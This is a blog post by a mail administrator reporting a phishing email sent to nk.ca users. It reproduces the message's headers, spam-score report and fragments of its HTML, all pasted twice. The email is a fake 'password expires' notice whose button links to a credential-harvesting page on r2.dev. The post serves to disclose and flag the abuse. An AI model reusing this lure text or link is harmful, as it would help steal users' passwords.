Credential phish on nk.ca users from nuxt networks Germany and Krixe Pte in the Netherlands
Posted by Dave Yadallee on
Return-path:
Envelope-to: aboo@nk.ca
Delivery-date: Tue, 11 Jun 2024 09:08:00 -0600
Received: from [147.45.197.250] (port=41492 helo=t-rexbaby.co.jp)
by doctor.nl2k.ab.ca with esmtp (Exim 4.97.1 (FreeBSD))
(envelope-from)
id 1sH35i-000000008IN-01TH
for aboo@nk.ca;
Tue, 11 Jun 2024 09:07:23 -0600
Received: from [38.255.61.249] (localhost [IPv6:::1])
by t-rexbaby.co.jp (Postfix) with ESMTP id CD3183063E0
for; Tue, 11 Jun 2024 16:40:51 +0200 (CEST)
From: nk.ca
To: aboo@nk.ca
Subject: aboo@nk.ca Password expires notification
Date: 11 Jun 2024 16:40:51 +0200
Message-ID: <20240611164051.D94B24F974298CAF@daiya-tsusho.co.jp>
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
X-Spam_score: 21.7
X-Spam_score_int: 217
X-Spam_bar: +++++++++++++++++++++
X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",
has identified this incoming email as possible spam. The original
message has been attached to this so you can view it or label
similar future email. If you have any questions, see
@@CONTACT_ADDRESS@@ for details.
Content preview: Dear aboo Your email aboo@nk.ca password expires today. Continue
with the same password below to avoid disconnection.
Content analysis details: (21.7 points, 5.0 required)
pts rule name description
---- ---------------------- --------------------------------------------------
1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org
[147.45.197.250 listed in dnsbl.ahbl.org]
[147.45.197.250 listed in dnsbl.ahbl.org]
[147.45.197.250 listed in dnsbl.ahbl.org]
[147.45.197.250 listed in dnsbl.ahbl.org]
1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org
[147.45.197.250 listed in dnsbl.ahbl.org]
0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org
[147.45.197.250 listed in dnsbl.ahbl.org]
0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org
[147.45.197.250 listed in dnsbl.ahbl.org]
0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org
[147.45.197.250 listed in dnsbl.ahbl.org]
1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
1.9 URIBL_ABUSE_SURBL Contains an URL listed in the ABUSE SURBL blocklist
[URI: pub-04e98cff18e4472a81f25d74577167d2.r2.dev]
1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)
0.9 SPF_HELO_SOFTFAIL SPF: HELO does not match SPF record (softfail)
1.0 HK_RANDOM_FROM From username looks random
0.6 HK_RANDOM_ENVFROM Envelope sender username looks random
1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
0.0 HTML_MESSAGE BODY: HTML included in message
1.3 RDNS_NONE Delivered to internal network by a host with no rDNS
-0.0 T_SCC_BODY_TEXT_LINE No description available.
0.0 GOOG_REDIR_NORDNS Google redirect to obscure spamvertised website +
no rDNS
0.7 TO_NO_BRKTS_FROM_MSSP Multiple formatting errors
1.5 VOWEL_FROM_6 Impronouncable from header (6 consecutive vowels)
2.0 PDS_DBL_URL_TNB_RUNON Double-url and To no arrows, from runon
0.0 T_FROM_MISSP_DKIM From misspaced, DKIM dependable
0.1 TO_IN_SUBJ To address is in Subject
0.0 TO_NO_BRKTS_NORDNS_HTML To: misformatted and no rDNS and HTML only
1.7 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)
2.4 RAZOR2_CF_RANGE_E8_51_100 Razor2 gives engine 8 confidence level
above 50%
[cf: 100]
0.4 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%
[cf: 100]
0.0 FSL_BULK_SIG Bulk signature with no Unsubscribe
Subject: {SPAM?} aboo@nk.ca Password expires notification
X-Antivirus: AVG (VPS 240611-2, 6/11/2024), Inbound message
X-Antivirus-Status: Clean
one; text-indent: 0px; letter-spacing: normal; font-family: Arial, Helvetic=
a, sans-serif; font-size: 15px; font-style: normal; font-weight: 400; word-=
spacing: 0px; white-space: normal; orphans: 2; widows: 2; font-variant-liga=
tures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; t=
ext-decoration-thickness: initial; text-decoration-style: initial; text-dec=
oration-color: initial;">
Dear
gb(0, 128, 0);"> aboo
text-indent: 0px; letter-spacing: normal; font-family: Arial, Helvetica, sa=
ns-serif; font-size: 15px; font-style: normal; font-weight: 400; word-spaci=
ng: 0px; white-space: normal; orphans: 2; widows: 2; font-variant-ligatures=
: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-d=
ecoration-thickness: initial; text-decoration-style: initial; text-decorati=
on-color: initial;">
Your email
n style=3D"color: rgb(255, 0, 0);">aboo@nk.ca password expi=
res today.
Continue with the same password below to=
avoid disconnection.
; color: rgb(36, 36, 36); text-transform: none; text-indent: 0px; letter-sp=
acing: normal; font-family: Arial, Helvetica, sans-serif; font-size: 15px; =
font-style: normal; font-weight: 400; word-spacing: 0px; vertical-align: ba=
seline; white-space: normal; orphans: 2; widows: 2; font-stretch: inherit; =
font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-str=
oke-width: 0px; text-decoration-thickness: initial;=20
text-decoration-style: initial; text-decoration-color: initial; font-varian=
t-numeric: inherit; font-variant-east-asian: inherit;">
s Serif">
55, 255); vertical-align: baseline; display: inline-block; background-color=
: blue; text-decoration-line: none;" href=3D"https://pub-04e98cff18e4472a81=
f25d74577167d2.r2.dev/index.html#aboo@nk.ca" target=3D"_blank" rel=3D"noope=
ner noreferrer"=20
data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://pub-04e98cff=
18e4472a81f25d74577167d2.r2.dev/index.html%23%5B%5B-Email-%5D%5D&source=
=3Dgmail&ust=3D1718107626365000&usg=3DAOvVaw3hvrxNopdfFnu_T7hbiJMI"=
>Keep the same password
Envelope-to: aboo@nk.ca
Delivery-date: Tue, 11 Jun 2024 09:08:00 -0600
Received: from [147.45.197.250] (port=41492 helo=t-rexbaby.co.jp)
by doctor.nl2k.ab.ca with esmtp (Exim 4.97.1 (FreeBSD))
(envelope-from
id 1sH35i-000000008IN-01TH
for aboo@nk.ca;
Tue, 11 Jun 2024 09:07:23 -0600
Received: from [38.255.61.249] (localhost [IPv6:::1])
by t-rexbaby.co.jp (Postfix) with ESMTP id CD3183063E0
for
From: nk.ca
To: aboo@nk.ca
Subject: aboo@nk.ca Password expires notification
Date: 11 Jun 2024 16:40:51 +0200
Message-ID: <20240611164051.D94B24F974298CAF@daiya-tsusho.co.jp>
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
X-Spam_score: 21.7
X-Spam_score_int: 217
X-Spam_bar: +++++++++++++++++++++
X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",
has identified this incoming email as possible spam. The original
message has been attached to this so you can view it or label
similar future email. If you have any questions, see
@@CONTACT_ADDRESS@@ for details.
Content preview: Dear aboo Your email aboo@nk.ca password expires today. Continue
with the same password below to avoid disconnection.
Content analysis details: (21.7 points, 5.0 required)
pts rule name description
---- ---------------------- --------------------------------------------------
1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org
[147.45.197.250 listed in dnsbl.ahbl.org]
[147.45.197.250 listed in dnsbl.ahbl.org]
[147.45.197.250 listed in dnsbl.ahbl.org]
[147.45.197.250 listed in dnsbl.ahbl.org]
1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org
[147.45.197.250 listed in dnsbl.ahbl.org]
0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org
[147.45.197.250 listed in dnsbl.ahbl.org]
0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org
[147.45.197.250 listed in dnsbl.ahbl.org]
0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org
[147.45.197.250 listed in dnsbl.ahbl.org]
1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
1.9 URIBL_ABUSE_SURBL Contains an URL listed in the ABUSE SURBL blocklist
[URI: pub-04e98cff18e4472a81f25d74577167d2.r2.dev]
1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)
0.9 SPF_HELO_SOFTFAIL SPF: HELO does not match SPF record (softfail)
1.0 HK_RANDOM_FROM From username looks random
0.6 HK_RANDOM_ENVFROM Envelope sender username looks random
1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
0.0 HTML_MESSAGE BODY: HTML included in message
1.3 RDNS_NONE Delivered to internal network by a host with no rDNS
-0.0 T_SCC_BODY_TEXT_LINE No description available.
0.0 GOOG_REDIR_NORDNS Google redirect to obscure spamvertised website +
no rDNS
0.7 TO_NO_BRKTS_FROM_MSSP Multiple formatting errors
1.5 VOWEL_FROM_6 Impronouncable from header (6 consecutive vowels)
2.0 PDS_DBL_URL_TNB_RUNON Double-url and To no arrows, from runon
0.0 T_FROM_MISSP_DKIM From misspaced, DKIM dependable
0.1 TO_IN_SUBJ To address is in Subject
0.0 TO_NO_BRKTS_NORDNS_HTML To: misformatted and no rDNS and HTML only
1.7 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)
2.4 RAZOR2_CF_RANGE_E8_51_100 Razor2 gives engine 8 confidence level
above 50%
[cf: 100]
0.4 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%
[cf: 100]
0.0 FSL_BULK_SIG Bulk signature with no Unsubscribe
Subject: {SPAM?} aboo@nk.ca Password expires notification
X-Antivirus: AVG (VPS 240611-2, 6/11/2024), Inbound message
X-Antivirus-Status: Clean
one; text-indent: 0px; letter-spacing: normal; font-family: Arial, Helvetic=
a, sans-serif; font-size: 15px; font-style: normal; font-weight: 400; word-=
spacing: 0px; white-space: normal; orphans: 2; widows: 2; font-variant-liga=
tures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; t=
ext-decoration-thickness: initial; text-decoration-style: initial; text-dec=
oration-color: initial;">
Dear
gb(0, 128, 0);"> aboo
text-indent: 0px; letter-spacing: normal; font-family: Arial, Helvetica, sa=
ns-serif; font-size: 15px; font-style: normal; font-weight: 400; word-spaci=
ng: 0px; white-space: normal; orphans: 2; widows: 2; font-variant-ligatures=
: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-d=
ecoration-thickness: initial; text-decoration-style: initial; text-decorati=
on-color: initial;">
Your email
n style=3D"color: rgb(255, 0, 0);">aboo@nk.ca password expi=
res today.
Continue with the same password below to=
avoid disconnection.
; color: rgb(36, 36, 36); text-transform: none; text-indent: 0px; letter-sp=
acing: normal; font-family: Arial, Helvetica, sans-serif; font-size: 15px; =
font-style: normal; font-weight: 400; word-spacing: 0px; vertical-align: ba=
seline; white-space: normal; orphans: 2; widows: 2; font-stretch: inherit; =
font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-str=
oke-width: 0px; text-decoration-thickness: initial;=20
text-decoration-style: initial; text-decoration-color: initial; font-varian=
t-numeric: inherit; font-variant-east-asian: inherit;">
s Serif">
55, 255); vertical-align: baseline; display: inline-block; background-color=
: blue; text-decoration-line: none;" href=3D"https://pub-04e98cff18e4472a81=
f25d74577167d2.r2.dev/index.html#aboo@nk.ca" target=3D"_blank" rel=3D"noope=
ner noreferrer"=20
data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://pub-04e98cff=
18e4472a81f25d74577167d2.r2.dev/index.html%23%5B%5B-Email-%5D%5D&source=
=3Dgmail&ust=3D1718107626365000&usg=3DAOvVaw3hvrxNopdfFnu_T7hbiJMI"=
>Keep the same password
Serif">
"3">IT Support
">This notification is assigned to
;">
aboo@nk.ca.
>